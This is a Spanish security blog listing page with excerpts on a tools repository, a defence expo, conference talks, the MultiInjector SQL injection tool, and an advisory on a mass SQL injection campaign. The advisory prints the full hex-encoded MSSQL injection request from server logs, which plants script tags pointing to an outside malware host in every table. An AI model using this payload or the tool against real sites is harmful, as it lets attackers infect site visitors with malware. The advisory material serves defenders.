Repositorio con Herramientas de Seguridad

Gracias a kagure he encontrado un repositorio bastante ordenado con herramientas de seguridad, algunos grandes conocidas, otras no tanto, pero todas muy útiles. Les dejo los enlaces a cada categoría para que descubras nuevas herramientas, aprendas de ellas y las utilices. Bluetooth Tools/ Browser Extensions/ Exploitation Tools/ Information Gathering/ Libraries/ Network Discovery tools/ Network Login Auditors/ Network Security Scanners/ Networking Utilities/ OS Detection Tools/ Packet Crafting Tools/ Packet Sniffers/ Password Auditing/ Password Cracking/ Port Scanners/ Reverse Engineering/ SQL Injection/ SSL Checkers/ SSL Proxies/ Service Fingerprinting/ Thick Client Tools/ VoIP Security Tools/ Web Applicative Proxies/ Web Applicative Scanners/ Web Services Security Tools/ Web Vulnerability Scanners/...

Leer Más

Memorias ExpoDefensa 2009

Durante el desarrollo de la primera Feria Internacional de Ciencia y Tecnología para la Defensa y Seguridad, empresas nacionales y extranjeras no sólo tuvieron un espacio para exponer los más recientes adelantos en tecnologías relacionadas con la defensa y seguridad, tecnologías de información y comunicación, y tecnología militar y policial, sino que además participaron de la rueda de negocios que se realizo permanentemente en Expodefensa 2009. Así mismo, invitados y expositores pudieron participar del Simposio Internacional que se realizó en el marco de la Feria y contó con destacados conferencistas en aspectos de ciencia y tecnología para la defensa y seguridad, en donde se pudieron conocer de primera mano los últimos desarrollos del Sector Defensa. Expodefensa 2009 se dirigió a empresarios fabricantes de armamento, blindajes, navíos y embarcaciones, aeronaves, vehículos militares, munición de corto y largo alcance, sistemas de navegación, comunicaciones, integrados de mando y control, protección NBQ y motores terrestres, navales y aéreos. Igualmente, Expodefensa 2009 abrió sus puertas a desarrolladores y proveedores de sistemas, partes y mantenimiento, sistemas logísticos, simuladores, tecnología de información aeroespacial, de vehículos terrestres y navales, así como para expertos en manutención, diseño, entrenamiento y simulación. Expodefensa 2009 fue la primera Feria de Ciencia y Tecnología que se llevó a cabo en Colombia y que fue respaldada por el Ministerio de Defensa Nacional, las Fuerzas Militares, la Policía Nacional y el Grupo Social y Empresarial de la Defensa – GSED. Les dejo una serie de vídeos tomados por SamuraiBlanco en del evento: LexMark Soluciones Seguras de Impresión LexMark RFID Artículo escrito por Leonardo Huertas (@SamuraiBlanco) para La Comunidad...

Leer Más

Memorias y Videos del [email protected] III

El pasado 25 de septiembre se celebró en Bilbao españa el evento gratuito [email protected] III, en la sede de la Universidad de Deusto, Contó con la partición de ponentes que trabajan en empresas como Panda Security, Microsoft, S21Sec e Informatica64. Chema Alonso en su blog (Un Informático en el Lado del Mal) ha publicado las memorias y los vídeos de casi todas las charlas de este evento, espero que sean de su agrado. [email protected] III – Técnicas de protección de Software y Cracking Rootkits: Memory Subverting Iñaki Etxeberria [Panda Security] [email protected] III – Rootkits: Memory Subvertion Tempest: Mitos y Realidades Pablo Garaitzar “Txipi” [Universidad Deusto] [email protected] III – Tempest: Mitos y Realidades Network Access Protecction (NAP) Juan Luís Rambla [Informática64] [email protected] III – Network Access Protection (NAP) Ataques Masivos SQL Injection David Carmona [Spectra] [email protected] III – Ataques SQL Injection...

Leer Más

MultiInjector – Herramienta Automática de Inyección SQL

MultiInjector es una herramienta para realizar automáticamente sql injection en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s. Algunas Características de esta Herramienta son: Recibe una lista de URL como entrada Reconoce los parámetros URL de la lista Ejecución de comandos sobre el sistema operativo a distancia que permite xp_cmdshell en el servidor SQL, posteriormente, ejecutar cualquier comando introducido por el usuario sobre el sistema operativo Conexiones paralelas configurables para aumentar la velocidad del ataque Uso opcional de un proxy HTTP para ocultar el origen de los ataques Entre otras… Los Requisitos para ejecutarla… Python >= 2.4 Pycurl (compatible con la versión de Python) Psyco (compatible con la versión de Python) Puede descargar aquí MultiInjector de este enlace Para Mas Información click...

Leer Más

Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas

Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web. Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server. La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar. Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada. Los requests que saldrían en los logs del web server se asemejan al siguiente: GET /?’;[email protected]%20CHAR(4000);SET%20@ S=CAST(0x4445434C41524520405420766172636 8617228323535292C40432076617263686172283 430303029204445434C415245205461626C655F4 37572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D6520667 26F6D207379736F626A6563747320612C7379736 36F6C756D6E73206220776865726520612E69643 D622E696420616E6420612E78747970653D27752 720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E7874797 0653D323331206F7220622E78747970653D31363 729204F50454E205461626C655F437572736F722 04645544348204E4558542046524F4D202054616 26C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F535441545 5533D302920424547494E2065786563282775706 4617465205B272B40542B275D20736574205B272 B40432B275D3D5B272B40432B275D2B2727223E3 C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F73646F2E313030306D672E636 E2F63737273732F772E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432 B27206E6F74206C696B6520272725223E3C2F746 9746C653E3C736372697074207372633D2268747 4703A2F2F73646F2E313030306D672E636E2F637 37273732F772E6A73223E3C2F7363726970743E3 C212D2D272727294645544348204E45585420465 24F4D20205461626C655F437572736F7220494E5 44F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F43415 445205461626C655F437572736F72%20AS%20CHA R(4000));EXEC(@S);HTTP/1.1 Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas): DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘[email protected]+’] set [‘[email protected] +’]=[‘[email protected]+’]+””> Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros). Artículo escrito por Ricardo Lanziano entusiasta del software libre y Solaris para La Comunidad...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES